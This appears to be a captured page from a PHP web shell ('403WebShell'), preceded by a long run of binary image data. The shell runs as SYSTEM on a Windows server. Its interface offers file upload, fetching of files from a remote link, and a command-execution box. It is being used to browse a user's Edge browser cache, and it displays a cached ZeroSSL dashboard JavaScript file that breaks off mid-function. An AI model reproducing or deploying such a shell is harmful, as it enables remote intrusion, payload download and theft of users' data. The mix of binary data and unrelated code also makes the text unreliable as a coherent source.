�mˊ�;�@O��jE��j(�ا,��LX���LO���Ц�90�O�.����a��nA���7������j4 ��W��_ٓ�
��zW�jcB������y՗+EM�)d���N�g6�y1_x��p�$Lv :��9�"z��p���ʙ$��^��JԼ*�ϭ����o���=x�Lj�6�J��u82�A�H�3$�ٕ@�=Vv�]�'�qEz�;I˼��)��=��ɯ���x�/�W(V���p�����$
�m�������u�����񶤑Oqˎ�T����r��㠚x�sr�GC��byp�G��1ߠ�w e�8�$⿄����/�M{*}��W�]˷.�CK\�ުx���/$�WP w���r�
|i���&�}�{�X�
�>��$-��l���?-z���g����lΆ���(F���h�vS*���b���߲ڡn,|)mrH[���a�3�ר�[1��3o_�U�3�TC�$��(�=�)0�kgP���� ��u�^=��4 �WYCҸ:��vQ�ר�X�à��tk�m,�t*��^�,�}D*� �"(�I��9R����>`�`��[~Q]�#af��i6l��8���6�:,s�s�N6�j"�A4���IuQ��6E,�GnH��zS�HO�uk�5$�I�4��ؤ�Q9�@��C����wp �BGv[]�u�Ov��� 0I4���\��y�����Q�Ѹ��~>Z��8�T��a��q�ޣ;z��a���/��S��I:�ܫ_�|������>=Z����8:�S��U�I�J��"IY���8%b8���H��:�QO�6�;7�I�S��J��ҌAά3��>c���E+&jf$eC+�z�;��V�����
�r���ʺ������my�e���aQ�f&�
�6�ND ��.:��NT�vm�<-
u���ǝ\MvZY�N�NT��-A�>jr!S��n�O1�3�Ns�%�3D@���`������ܟ1�^c<�����a�ɽ�̲
�Xë#�w�|y�cW�=�<ITS�1�G]�b��I&�"B#E,�N` �l¡/'Pi��Ey�I���h���H�YH�A͑|4Z�A�����Q��>9I*H8�p�^(4���՗�k��arOcW�tO�\�ƍR��8����'�K���I�Q�����?5�>[�}��yU�ײ
-h��=��%	q�ThG�2�)���"ו3]�!kB��*p�FDl�A���,�eEi�H�f�Ps�����5�H:�Փ~�H�0Dت�D�I����h�F3�������c��2���E��9�H��5�zԑ�ʚ�i�X�=:m�xg�hd(�v����׊�9iS��O��d@0ڽ���:�p�5�h-��t�&���X�q�ӕ,��ie�|���7A�2���O%P��E��htj��Y1��w�Ѓ!����	����	ࢽ��My�7�\�a�@�ţ�J
 �4�Ȼ�F�@o�̒<D�Xw���j}�G}9���j{C�<F2�?!x� <�x�=
�K#jU��k��3sr�4�*�\3���T�s�#�Eu y�I���{���F'��_�f���
�.���c|�TP���z�~�%6���`�v����e*wD�O�˞ᐌN�
E�u�|̧hj����G: ��m{�<��SL�xS��4�(��Օ� ��
�#�t�gS�W�6�*E�
:E�QSá|�"�W_$����G���D�}�N~�wQME�c�؁����մs��s�\I�hU��#m� oJ��.�J�٭J��I�Z؂R�`C��Bۇ]�^Y;
Tѓ/.^�4�� 5�" ����ӭ�ҟ4��G ����І���jh�{l�oo�]N���a�+�ygm�.dY�!-W����աFnL��
>?4�wx��)��]�P��~�����u�����5�����7X�
�9��^ܩ�U;Iꭆ
5
�������eK2�7(�{|��Y׎
�V��\"���Z�1�
Z�����}��(�Ǝ"�1S���_�vE30>���p;�ΝD��%x�W�?W?v����o�^V�i�d��r[��/&>�~`�9Wh��y�;���R�� �;;ɮT��?����r$�g1�K����A��C��c��K��l:
�'��3
c�ﳯ*"t8�~l��)���m��+U,z��`( �>yJ�?����h>��]��v��ЍG*�{`��;y]��I�T�;c��NU�fo¾h���/$���|NS
���1�S�"�H��V���T���4��u
hǜ�]�v;���5�͠x��'C\�SBpl���h}�N����� A�Bx���%��ޭ�l��/����T��w�ʽ]D�=����K���ž�r㻠l4�S�O?=�k
�M:�
��c�C�a�#ha���)�ѐxc�s���gP�iG�� {+���x
���Q���I=	��
z��ԫ+
�8"�k�ñ�j=|��
��c
��y��CF��/ ��*9ж�h{
�?4�o���k�m�Q�N�x��;�Y��4膚�
a�w?�6�> e]�����Q�r�:����g�,i"�����ԩA� *M�<�G��b�if��l^M��5� �Ҩ�{����6J��ZJ�����P�*�����Y���ݛu�_4�9�I8�7���������,^ToR���m4�H��?�N�S�ѕw��/S��甍�@�9H�S�T��t�ƻ���ʒU��*{Xs�@����f��� ��֒Li�K{H�w^���������Ϥm�tq���s�
���ք��f:��o~s��g�r��ט�
�S�ѱC�e]�x���a��) ���(b-$(�j>�7q�B?ӕ�F��h<y�ci M�����Jc�����z�Nݝ:�ΧX����&]�+�\�T�F�4���@�+��
�ןO�׵���?�s�q8���(Y��Ʊ���*�RM��g�Ow0=g`��ښ�=�� 9���#�������o��m�r?���G񶨯�ǘ8��N�t1�%��<찘��5��?*�C�9�v����:�9��9?[�}~����a���)e�G+Ü�t(�N��JFm��e��[��P1'`�h% 4ﶹ�p�m�<��g=�۹��aa��x>V25r[7
Y�}L�R��}����*sg+��x�r�2�U=�*'WS��ZDW]�WǞ�<��叓���{�$�9Ou4��y�90-�1�'*D`�c�^o?(�9��u���ݐ��'PI&�
f�Jݮ�������:wS����jfP1F:X�H�9dԯ�� �˝[�_54�}*;@�ܨ
��	ð�yn�T���?�ןd�#���4rG�ͨ��H�1�|-#���Mr�S3��G�3�����)�.᧏3v�z֑��r����$G"�`j
�1t��x0<Ɔ�Wh6�y�6��,œ�Ga��gA����y��b��)� �h�D��ß�_�m��ü�gG;��e�v��ݝ�nQ�
��C����-�*��o���y�a��M��I�>�<���]obD��"�:���G�A��-\%LT�8���c�)��+y76���o�Q�#*{�(F�⽕�y����=���rW�\p<yۚQ��bz�To����}��TT�Qqs�,s�vm盭��]���	����l�A�q�T<4p�p�b��U��Q�}�Y@�uZH��
0n�����~�b|U�9/-�y#��@�7��]gxZ�Ո�ʟ�a���q�cÜ���M�r�u�r��#'PŻiՑ���o9���Y�����1;�s�����װ��/M"�3��hnt�T`UO��Xz�c�3�g��Cn"���m�e?�B�����9T�����ZW.�Y&�*GK�F��ݥz��q	�����ܧ�TNh#f�D���ᰎn�����}�fQ������69���ZL�C{�/P�̪(@a�[�11��^��J�F5s��T�ֺB��ŠW�~= ���X��.�������_#����*�v�9�*֕�N�;AÛ�5f`pi5n�Ֆb������:�m���ĦiV?�.j,�C
��-"��1��D)���`Ѭى,�jI9�ʈ����P����6��$u{�J��w��n4�Dm�m���y��}]���h�)ɹ#R#�΢ن���TZ���k�	����h(xe�G/�������EA��fQBA���?x���bk�T-���y4Ƈy��ИQ���4�3yk�Z&&�x�N�?Y
}�.��{lt��u����psm}Cfs�i
Y�v��/�ZH*1XG�8��GF��u�
SZ�#�{&#JȺ[H���su�^53�	��ݜf f讥]`��m���}h�=Xo,a����Ѣ�*����×^KJ1H~-�;,��Ƥ�d���D��B=
ƥ����ue�(�D�ӈF��%N5����f��8��6>���۩�c���A���^e6��K������ʐ�cVf5$�'->���ՉN"���F�"�UQ@�f��G<GZ6p�5�(tW3~�!�$�U��#�'���¿���[!���17���;OP�&)��F/w9� )�qn`��y��4��X(�c�m^X)�46� |l0 ̵����ג�����P���`�.Ԛ��7 ��Ẻ����( �D���ȃ&=���ڍ]�����Q�cՏ�ϴ���4���66q��+ԩ�e@�WYb����M
�@�`( ���eaP��Z�Y�N}��֧
�:z$��K1�I��������=јu�跄),n0`�}���^H���ӯ?C�:@��ED��NŨ;I�]E��/�9^Z��.?��JG� p9�����:�U��c�@ �mxJG�hΏ�t�k��FfS���a��V?F�*�\{-�է8�Q��_�5�tOnyUY6&�}%Ex�,ª�j�rj-��Y���~��"�g�U���X���Y��ԯE��3Tm�� I:�NU���Qw���C�ߛ�L(�H��u���d�]Ǽ����4���G�S���Y�&n[
$�A����2L��`6>b~��#�&�M=��8�ט�JNu9��D��[̤�s�o�~��� ���
G��9T�tW^g5y$b��Y'��س�Ǵ�=��U-2	#�MC�t(�i�	�lj�@Q
5�̣i�*�O����s�x�K�f��}\��M{E�V�{�υ��Ƈ�����);
�H����I��fe�Lȣr�2��>��W� I�Ȃ6������i��k���5�YOxȺ����>��Y�f5'��|��H+��98pj�n�.O�y�������jY��~��i�w'������l�;�s�2��Y��:'lg�ꥴ)o#'Sa�a�K��Z��m��}�`169�n���"���x��I ��*+�	
}F<��c���F�P�������
ֹ*�PqX�x۩��,�	��N��
�4<-����%����:��7����W���u�`����� $�?�I��&����o��o��`v�>��P��"��l���4��5'�Z�gE���8���?��[�X�7(��.Q�-��*���ތL@̲����v��.5���[��=�t\+�CNܛ��,g�SQnH����}*F�G16���&:�t��4ُ"A��̣��$�b �|����#rs��a�����T��]�<�j��B S�('$�ɻ�
�wP;�/�n��?�ݜ��x�F��yUn�~mL*-�������Xf�wd^�a�}��f�,=t�׵i�.2/wpN�Ep8�OР���•��R�FJ�	
55TZ��T
�ɭ�<��]��/�0�r�@�f��V��V����Nz�G��^���7hZi����k��3�,kN�e|�vg�1{9]_i��X5y7�
8e]�U����'�-2,���e"����]ot�I��Y_��n�(JҼ��1�O]bXc���Nu�No��pS���Q_���_�?i�~�x h5d'�(qw52]	��'ޤ�q��o1�R!���`ywy�A4u���h<קy���\[~�4�\ X�Wt/�	6�����n�F�a8��f���z
�3$�t(���q��q�x��^�XWeN'p<-v�!�{�(>ӽDP7��ո0�y)�e$ٕv�Ih'Q�EA�m*�H��RI��=:������4牢) �%_iN�ݧ�l]�	�Nt���G��H�L��
�
ɱ�g<���1V�,�J~�ٹ�"K��Q�� 9�HS�9�?@��k����r�;we݁�]I�!{
�@�G�[�"��`�
��J:�n]�{�cA�E����V��ʆ���#��U9�6����j�#Y�m\��q�e4h�B�7��C�������d<�?J����1g:ٳ���=Y���D�p�ц�׈ǔ��1�]26؜oS�'��9�V�FVu�P�h�9�x
c�oq�X��p�o�5��Ա5$�9W�V(�[Ak�aY錎qf;�'�[�|���b�6�Ck��)��#a#a˙��8���=äh�4��2��C��4tm^ �n'c� ��]GQ$[Wҿ��i���vN�{Fu��1�gx��1┷���N�m��{j-,��x��
Ūm�ЧS�[�s���Gna���䑴�
�
x�p8<������97�Q���ϴ�v�aϚG��Rt�Һ׈�f^\r��WH�JU�7Z���y)�vg=����n��4
�_)y��D'y�6�]�c�5̪ �\�
�PF�k����&�c;��cq�$~T�7j
���nç]�<�g	":�to�t}�159�<�/�8������m�b�K#g'I'.W����� 6��I/��>v��\�MN��g���m�A�yQL�4u�Lj�j9��#44�t��l^�}L����n��R��!��t��±]��r��h6ٍ>�yҏ�N��fU��	����Fm@�8}�/u��jb9������he:A�y�ծw��GpΧh�5����l}�3p468��)U��d��c���
�;Us/�֔�YX�1�O2��uq�s��`hwg�r~�{R��mhN��؎*q42�*th��>�#���E����#��Hv�O����q�}����� 6�e��\�,Wk�#���X��b>��p}�դ��3���T5��†��6��[��@ �P�y*n��|'f�֧>�lư΂�̺����SU�'*�q�p�_S�����M��	'��c�6��� ��m��ySʨ;M��r���Ƌ�m�Kxo,���Gm�P��A�G�:��i��w�9�}M(�^�V��$ǒ�ѽ�9���|���� �a����J�SQ�a���r�B;����}���ٻ֢�2�%U���c�#�g���N�a�ݕ�'�v�[�OY'��3L�3�;,p�]@�S��{ls��X�'���c�jw� k'
a�.��}�}&��
�dP�*�bK=ɍ!����;3n�gΊU�ߴmt�'*{,=SzfD�
A��ko~�G�aoq�_mi}#�m�������P�Xhύ��� �mxǍ�΂���巿zf��Q���c���|kc�����?���W��Y�$���_Lv����l߶��c���`?����l�j�ݲˏ!V��6����U�Ђ(A���4y)H���p�Z_�x��>���e�� R��$�/�`^'3qˏ�-&Q�=?��CFVR
�D�fV�9��{�8g�������n�h�(P"��6�[�D���<
E�����~0<@�`�G�6����Hг�cc��
�c�K.5��D��d�B���`?�XQ��2��ٿyqo&+�1^�DW�0�ꊩ���G�#��Q�nL3��c���������/��x
��1�1 [y�x�პCW��C�c�UĨ80�m�e�4.{�m��u���I=��f�����0QRls9���f���������9���~f�����Ǩ��a�"@�8���ȁ�Q����#c�ic������G��$���G���r/$W�(��W���V�"��m�7�[m�A�m����bo��D�j����۳�l���
^�k�h׽�����
��#�iXn�v��eT�k�a�^Y�4�BN�� ĕ�� 0 
     
  !01@Q"2AaPq3BR������ 


? � ��@4�Q�����T3,���㺠�W�[=JK�Ϟ���2�r^7��vc�:�9�E�ߴ�w�S#d���Ix��u��:��Hp��9E!��
V2;73|F��9Y���*ʬ�F��D����u&���y؟��^EA��A��(ɩ���^��GV:ݜDy�`��Jr29ܾ�㝉��[���E;Fzx��YG��U�e�Y�C����	����v-tx����I�sם�Ę�q��Eb�+P\	:>�i�C'�;�����k|z�رn�y]�#ǿb��Q��������w�����(�r|ӹs��[�D��2v-%��@;�8<a���[\o[ϧw��I!��*0�krs)�[�J9^��ʜ��p1)�	"��/_>��o��<1����A�E�y^�C�
�`�x1'ܣn�p��s`l���fQ��):�l����b>�Me�jH^?�kl3(�z:���1ŠK&?Q�~�{�ٺ�h�y���/�[��V�|6��}�KbX����mn[-��7�
5q�94�������dm���c^���h�
X��5��<�eޘ>G���-�}�دB�ޟ�
��|�rt�M��V+�]�c?�-#ڛ��^ǂ}���Lkr���O��u�>�-D�ry�D?:ޞ�U��ǜ�7�V��?瓮�"�#���r��չģVR;�n���/_�؉v�ݶe5d�b9��/O��009�G���5n�W����JpA�*�r9�>�1��.[t���s
�F���nQ�
V77R�]�ɫ8����_0<՜�IF�u(v��4��F�k�3��E)��N:��yڮe��P�`�1}�$WS��J�SQ�N�j 
�ٺ��޵�#l���ј(�5=��5�lǏmoW�v-�1����v,W�mn��߀$x�<����v�j(����c]��@#��1������Ǔ���o'��u+����;G�#�޸��v-lη��/(`i⣍Pm^� ��ԯ̾9Z��F��������n��1�����]�[��)�
'������ :�֪�W��FC�
����	�B9،!?���]��V��A�Վ�M��b�w��G
F>_DȬ0¤�#�QR�[V��kz���m�w�"��9ZG�7'[��=�Q����j8R?�zf�\a�=��O�U����*oB�A�|G���2�54
�p��.w7�
��
 ��&������ξxGHp�B%��$g�����t�Џ򤵍z���HN�u�Я�-�'4��0�� ;_�� 3 

     
  !01"@AQa2Pq#3BR������ 


? � �ʩca��en��^��8���<�u#��m*08r��y�N"�<�Ѳ0��@\�p���	�����Kv�D��J8�Fҽ�
�f�Y��-m�ybX�NP����}�!*8t(�OqѢ��Q�wW�K��ZD��Δ^e��!� ��B�K��p~�����e*l}z#9ң�k���q#�Ft�o��S�R����-�w�!�S�
��Ӥß|M�l޶V��!eˈ�8Y���c�ЮM2��tk����
������J�fS����Ö*i/2�����n]�k�\���|4yX�8��U�P.���Ы[���l��@"�t�<������5�lF���vU�����W��W��;�b�cД^6[#7@vU�xgZv��F�6��Q,K�v��� �+Ъ��n��Ǣ��Ft���
8��0��c�@�!�Zq
s�v�t�;#](B��-�nῃ~���3g������5�J�%���O������n�kB�ĺ�.r��+���#�N$?�q�/�s�6��p��a����a��J/��M�8��6�ܰ"�*������ɗud"\w���aT(����[��F��U՛����RT�b���n�*��6���O��SJ�.�ij<�v�MT��R\c��5l�sZB>F��<7�;EA��{��E���Ö��1U/�#��d1�a�n.1ě����0�ʾR�h��|�R��Ao�3�m3
��%�� ���28Q� 
��y��φ���H�To�7�lW>����#i`�q���c����a����m,B�-j����݋�'mR1Ήt�>��V��p���s�0IbI�C.���1R�ea�����]H�6�������� ��4B>��o��](��$B���m�����a�!=� �?�B�
K�Ǿ+�Ծ"�n���K��*��+��[T#�{ E�J�S����Q�
����s�5�:�U�\wĐ�f�3����܆&�)��� �I���Ԇw��E	T�lrTf6Q|R�h:��[K��
�z��c֧�G�C��%\��_�a �84��HcO�bi��ؖV��7H
�)*ģK~Xhչ0��4?�0���
�E<���}3
���#���u�?��
��|g�S�6ꊤ�|�I#Hڛ�	�ա��w�X��9��7�
��Ŀ%�SL��y6č��|�F�a8���b� �$�sק�h���b9RAu7�˨p�Č�_\*w��묦��F����4D~�f����|(�"m���NK��i�S�>�$d7SlA�
�/�²����SL��|6N�}���S�˯���g��]6��;�#�.��<���q'Q�1|KQ$�����񛩶"�$r�b:���N8�w@��8$��
�AjfG|~�9F���Y��ʺ��Bwؒ������M:I岎�G��`s�YV5����6��A �b:�W���G�q%l�����F��H���7�������Fsv7� �k��
<html>
<!doctypehtml><html><head><title>403WebShell</title><meta content="noindex"name="robots"></head><body bgcolor="#1f1f1f"text="#ffffff"><link href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/4.7.0/css/font-awesome.min.css"rel="stylesheet"><style>@import url(https://fonts.googleapis.com/css?family=Dosis);@import url(https://fonts.googleapis.com/css?family=Bungee);@import url(https://fonts.googleapis.com/css?family=Russo+One);body{font-family:Consolas,cursive;text-shadow:0 0 1px #757575}body::-webkit-scrollbar{width:12px}body::-webkit-scrollbar-track{background:#1f1f1f}body::-webkit-scrollbar-thumb{background-color:#1f1f1f;border:3px solid gray}#content tr:hover{background-color:#636263;text-shadow:0 0 10px #fff}#content .first{background-color:#5e5e5e}#content .first:hover{background-color:#25383c;text-shadow:0 0 1px #757575}table{border:1px #000 dotted;table-layout:fixed}td{word-wrap:break-word}a{color:#df5;text-decoration:none}a:hover{color:#000;text-shadow:0 0 10px #fff}input,select,textarea{border:1px #000 solid;-moz-border-radius:5px;-webkit-border-radius:5px;border-radius:5px}.gas{background-color:#1f1f1f;color:#fff;cursor:pointer}select{background-color:transparent;color:#fff}select:after{cursor:pointer}.linka{background-color:transparent;color:#fff}.up{background-color:transparent;color:#fff}option{background-color:#1f1f1f}.btf{background:0 0;border:1px #fff solid;cursor:pointer}::-webkit-file-upload-button{background:0 0;color:#fff;border-color:#fff;cursor:pointer}</style><center><font face="Bungee" size="5">403Webshell</font></center>
<table width="100%" border="0" cellpadding="3" cellspacing="1" align="center">
<tr><td>Server IP : <font color=#df5>127.0.0.1</font> &nbsp;/&nbsp; Your IP : <font color=#df5>10.100.1.254</font><br>Web Server : <font color='#df5'>Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30</font><br>System : <font color='#df5'>Windows NT WIZC-EXTRANET 10.0 build 19045 (Windows 10) AMD64</font><br>User : <font color='#df5'>SYSTEM&nbsp;</font>( <font color='#df5'>0</font>)<br>PHP Version : <font color='#df5'>8.0.30</font><br>Disable Function : <font color='#df5'>NONE</font></font><br>MySQL : <font color=red>OFF</font> &nbsp;|&nbsp; cURL : <font color=green>ON</font> &nbsp;|&nbsp; WGET : <font color=red>OFF</font> &nbsp;|&nbsp; Perl : <font color=red>OFF</font> &nbsp;|&nbsp; Python : <font color=red>OFF</font> &nbsp;|&nbsp; Sudo : <font color=red>OFF</font> &nbsp;|&nbsp; Pkexec : <font color=red>OFF</font><br>Directory : &nbsp;<a href="?loknya=/">/</a><a href="?loknya=/Users">Users</a>/<a href="?loknya=/Users/owner">owner</a>/<a href="?loknya=/Users/owner/AppData">AppData</a>/<a href="?loknya=/Users/owner/AppData/Local">Local</a>/<a href="?loknya=/Users/owner/AppData/Local/Microsoft">Microsoft</a>/<a href="?loknya=/Users/owner/AppData/Local/Microsoft/Edge">Edge</a>/<a href="?loknya=/Users/owner/AppData/Local/Microsoft/Edge/User Data">User Data</a>/<a href="?loknya=/Users/owner/AppData/Local/Microsoft/Edge/User Data/Default">Default</a>/<a href="?loknya=/Users/owner/AppData/Local/Microsoft/Edge/User Data/Default/Cache">Cache</a>/<a href="?loknya=/Users/owner/AppData/Local/Microsoft/Edge/User Data/Default/Cache/Cache_Data">Cache_Data</a>/</td></tr><tr><td><br>Upload File : <form enctype="multipart/form-data" method="post">
<input type="radio" value="1" name="dirnya" checked>current_dir [ <font color='green'>Writeable</font> ]
<input type="radio" value="2" name="dirnya" >document_root [ <font color='green'>Writeable</font> ]
<br>
<input type="hidden" name="upwkwk" value="aplod">
<input type="file" name="berkas"><input type="submit" name="berkasnya" value="Upload" class="up" style="cursor: pointer; border-color: #fff"><br>
<input type="text" name="darilink" class="up" placeholder="https://linuxploit.com/upload.txt">&nbsp;<input type="text" name="namalink" class="up" size="5" placeholder="kerang.txt"><input type="submit" name="linknya" class="up" value="Upload" style="cursor: pointer; border-color: #fff">
</form><br><form method="post" enctype="application/x-www-form-urlencoded">
Command : <input type="text" name="komend" class="up" style="cursor: pointer; border-color: #000" value="">
<input type="submit" name="komends" value=">>" class="up" style="cursor: pointer; border-color: #fff">
</form></table><br><hr><center style="font-family: Russo One">[ <a href='/admin/upload/files/algoritma.php'>Back</a> ]&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<hr></center><br><tr><td>Current File : /Users/owner/AppData/Local/Microsoft/Edge/User Data/Default/Cache/Cache_Data/f_000051</tr></td></table><br/><pre>/* INIT */

var body = $('body');

var isProduct = body.find('[name=&quot;is_product&quot;]').val();

var googleAnalyticsID = body.find('[name=&quot;google_analytics_id&quot;]').val();

const isTestUser = parseInt(body.find('[name=&quot;is_test_user&quot;]').val());

var currentPath;
var currentFile = body.find('[name=&quot;current_file&quot;]').val();
var currentPage;
var currentType;
var currentID;
var currentAdditionalParameters;

/* PAGINATION VARS */
var parameterStatus;
var parameterSearch;
var parameterLimit;
var parameterPage;

var autoRefreshInterval;
var autoRefreshCount = 0;

var htmlTitle;

var browserHistory = [];

const urlParams = new URLSearchParams(window.location.search);

function init() {

	/* stop auto-refresh */
	stopAutoRefresh();

	// set auto refresh counter back to 0
	if (currentPage !== 'install') {
	autoRefreshCount = 0;
	}

	/* set environment variables */
	currentPath = window.location.pathname;
	currentPage = $('[name=&quot;current_page&quot;]').val();
	currentType = $('[name=&quot;current_type&quot;]').val();
	currentID = $('[name=&quot;current_id&quot;]').val();
	htmlTitle = body.find('[name=&quot;html_title&quot;]').val();
	currentAdditionalParameters = $('[name=&quot;current_additional_parameters&quot;]').val();

	/* set page title */
	$('title').text(htmlTitle + ' - ZeroSSL');

	/* fix for iOS devices not finishing Pace.js loading - https://github.com/HubSpot/pace/issues/440 */
	(function ($) {
		if (/iPad|iPhone|iPod/.test(navigator.userAgent) &amp;&amp; !window.MSStream) {
			Pace.stop();
		}
	}) (jQuery);

	// force a fake encryption key if url parameter is set
	if(window.location.href.indexOf('force_key=1') !== -1) {
		storeEncryptionKey('force_key');
	}

	/* if user has no encryption key in local storage, auto log out */
	if (!localStorage.getItem('encryption_key') || localStorage.getItem('encryption_key').length &lt; 64) {
		logOut('encryption_key');
	}

	/* invalidate all private keys if local storage item present */
	if (localStorage.getItem('inv_pk') === 'true') {

		// perform invalidation
		invalidateAllPrivateKeys();

		// remove cookie afterwards
		localStorage.removeItem('inv_pk') ;

	}

	/* close mobile dropdown menu */
	body.find('.mobile_dropdown_open').removeClass('mobile_dropdown_open').hide();
	body.removeClass('overflow_hidden');

	/* handle Zendesk widget */
	handleZendeskWidget();

	/* page specific init */
	switch (currentPage) {

		case 'certificates':
			loadTable();
		break;

		case 'checkout':

			if (body.find('[name=&quot;checkout[paid_or_cancelled]&quot;]').val() != 'true') {
			initStripe('elements_enabled');
			}

		break;

		case 'order':

			// process domain passed from signup
			if (body.find('[name=&quot;additional_parameter[domain_to_secure]&quot;]').val()) {
			processDomainsToProtect(body.find('[name=&quot;wizard[order][domains][domain]&quot;]'));
			}

			// if renewal, process all domains and pre-select plan
			if (body.find('[name=&quot;wizard[order][is_renewal]&quot;]').val() === 'true') {
			processAllDomains();
			wizardPreselectPlan();
			}


		break;

		case 'install':

			// start auto-refresh
			if (body.find('[name=&quot;enable_auto_refresh&quot;]').val() === 'true') {
			startAutoRefresh();
			}

		break;

	}

	initForge();

	// ZERO-178
	// Set default selected domain verification method on loading of Verify Domain page.
	// This domain verification method will then be propagated and displayed at the Finalize Domain verification step
	if (currentPage &amp;&amp; currentPage === &quot;verify&quot;) {
		updateVerificationSummary();
	}

	// ZERO-148
	// When user is inputting certificate name on &quot;certificate/new&quot;, pressing enter key would reload page,
	// instead we want user to go to next step in the wizard.
	if (currentPage &amp;&amp; currentPage === &quot;order&quot;) {
		preventEnterKeyOnCertificateNameInput();
	}
}

function preventEnterKeyOnCertificateNameInput() {
	$('form[name=&quot;wizard[order][domains]&quot;]').on(&quot;keypress&quot;, function(e) {
		const key = e.charCode || e.keyCode || 0;
		if (key == 13) {
			e.preventDefault();
			$(&quot;.next_step&quot;).first().trigger(&quot;click&quot;);
		}
	})
}

/* INITIAL PAGE LOAD */
$(document).ready(function() {
	&quot;use strict&quot;;

	// prevent caching with ajax
	$.ajaxSetup({ cache: false });

	init();
	currentPath = window.location.pathname;

	browserHistory[0] = {
			indexNo: 0,
			pagePath: window.location.pathname,
			getFile: body.find('[name=&quot;current_file&quot;]').val(),
			getPage: body.find('[name=&quot;current_page&quot;]').val(),
			getType: body.find('[name=&quot;current_type&quot;]').val(),
			getID: body.find('[name=&quot;current_id&quot;]').val(),
			getAdditionalParameters: body.find('[name=&quot;current_additional_parameters&quot;]').val(),
	};

	//console.log(JSON.stringify(browserHistory));

});

/* AJAX PAGE LOAD */
function goToPage(pagePath, getFile, getPage, getType, getID, isBackOrForward, generalInfoArray, additionalParams) {

	var URL;

    let acstat = parseInt(body.attr('data-acstat'));

    if(acstat === 3) {
        let blockedPages = [&quot;dashboard&quot;,&quot;certificates&quot;,&quot;developer&quot;,&quot;protection&quot;];

        for(let blockedIndex in blockedPages) {
            if(getPage.startsWith(blockedPages[blockedIndex])) {
                window.location.href = &quot;/billing&quot;;
            }
        }
    }
	if (additionalParams) {
	    URL = '/pages/'+getFile+'.php?is_ajax=1&amp;page='+getPage+'&amp;type='+getType+'&amp;id='+getID + additionalParams;
	} else {
	    URL = '/pages/'+getFile+'.php?is_ajax=1&amp;page='+getPage+'&amp;type='+getType+'&amp;id='+getID;
	}

	// if target URL is not current URL
	if (pagePath !== window.location) {

		// rewrite URL in browser
		window.history.pushState({path:pagePath}, '', pagePath);

		// only save this page to browser history if it's not the back button AND if target page is not the last saved page
		if (isBackOrForward !== true &amp;&amp; (browserHistory[browserHistory.length-1] !== undefined) &amp;&amp; (browserHistory[browserHistory.length-1].pagePath !== pagePath)) {

			var indexNo = browserHistory.length;

			browserHistory[indexNo] = {
			indexNo: indexNo,
			pagePath: pagePath,
			getFile: getFile,
			getPage: getPage,
			getType: getType,
			getID: getID,
			getAdditionalParameters: additionalParams
			};

			/* refresh environment variables */
			currentFile = getFile;
			currentPath = pagePath;

		}

		//console.log(JSON.stringify(browserHistory));

	}

	$.ajax({
		type: 'GET',
		url: URL,
		dataType: &quot;html&quot;,
		statusCode: {
    		205: function() {
        	window.location.href = '/login';
			return false;
    		}
		},
		error: function(XMLHttpRequest, textStatus, errorThrown) {
     		//alert(textStatus + ', ' + errorThrown);
  		},
		success: function(data) {

			// append page to main content
			$('main').html(data);

			// initialize
			init();

			// alert after page change
			if (generalInfoArray) {

				generalInfo(generalInfoArray[0], generalInfoArray[1], generalInfoArray[2], generalInfoArray[3]);

			}

			// scroll to top
			scrollToTop(0);

			// send GA event
			gtag('config', googleAnalyticsID, {
			  'page_path': pagePath
			});

			return false;

		}

	});

}


/* REFRESH CURRENT PAGE */
function reloadPage(generalInfoArray) {
	'use strict';
	goToPage(currentPath, currentFile, currentPage, currentType, currentID, true, generalInfoArray, currentAdditionalParameters);
}


body.on('click', '[data-ajax=&quot;true&quot;]', function (event) {

	event.preventDefault();

	var pagePath = $(this).attr('href');

    // Check &quot;open in new window/tab&quot; key modifiers
    if (event.shiftKey || event.ctrlKey || event.metaKey) {
	window.open(pagePath, '_blank');
	return false;
	}

	var getFile = $(this).attr('data-ajax-get-file');
	var getPage = $(this).attr('data-ajax-get-page');
	var getType = $(this).attr('data-ajax-get-type');
	var getID = $(this).attr('data-ajax-get-id');

	var getAdditionalParams = $(this).attr('data-ajax-get-parameters') ? $(this).attr('data-ajax-get-parameters') : null;

	/* respect last page additional parameters for onpage back button */
	if ($(this).attr('data-ajax-is-onpage-back-button') &amp;&amp; browserHistory.length &gt; 1) {

		getAdditionalParams = browserHistory[browserHistory.length - 2].getAdditionalParameters;

		if (!pagePath) {
		pagePath = browserHistory[browserHistory.length - 2].pagePath;
		}

	}

	goToPage(pagePath, getFile, getPage, getType, getID, false, null, getAdditionalParams);

});



/* HANDLE BACK BUTTON */
$(window).bind('popstate', function() {
	&quot;use strict&quot;;

	var indexNo = browserHistory.length;
	var indexNoBefore = indexNo - 2;

	if (indexNo &gt; 1) {

		var pagePath = browserHistory[indexNoBefore].pagePath;
		var getFile = browserHistory[indexNoBefore].getFile;
		var getPage = browserHistory[indexNoBefore].getPage;
		var getType = browserHistory[indexNoBefore].getType;
		var getID = browserHistory[indexNoBefore].getID;
		var getAdditionalParams = browserHistory[indexNoBefore].getAdditionalParameters;

		//console.log(getAdditionalParams);

		goToPage(pagePath, getFile, getPage, getType, getID, true, null, getAdditionalParams);
		browserHistory = browserHistory.slice(0, -1);

	}

});


/* CHANGE PASSWORD SWITCHER */
body.on('click', '[data-action=&quot;change_password&quot;]', function (event) {

	event.preventDefault();

	var button = $(this);
	var form = $(this).closest('form');

	if (!button.attr('data-action-confirmed') &amp;&amp; !form.hasClass('changing_password')) {

		openPopup('confirm_change_password');

		body.on('submit', 'form[name=&quot;confirm_change_password&quot;]', function(event) {

			event.preventDefault();

			// add confirmation tag for a second, re-submit action, then remove confirmation tag
			button.attr('data-action-confirmed', 'true').click().removeAttr('data-action-confirmed');

			// open change password form
			form.addClass('changing_password');

			closePopup();

		});

		return false;

	}

	form.toggleClass('changing_password');

	form.find('[name=&quot;account[details][current_password]&quot;]').val('');
	form.find('[name=&quot;account[details][new_password]&quot;]').val('');
	form.find('[name=&quot;account[details][new_password_repeat]&quot;]').val('');


});

body.on('keyup', '#change_password_understand', function(e) {
    e.preventDefault();
    if($(this).val() === &quot;UNDERSTOOD&quot;) {
        $('#confirm_change_password_submit').removeAttr('disabled');
    }
});

/* AJAX - SAVE ACCOUNT DETAILS */
body.on('submit', 'form[name=&quot;account[details]&quot;]', function(e) {
	&quot;use strict&quot;;
	e.preventDefault();

	var button = $(this).find('button[type=&quot;submit&quot;]');

	var error = false;
	var errors = 0;

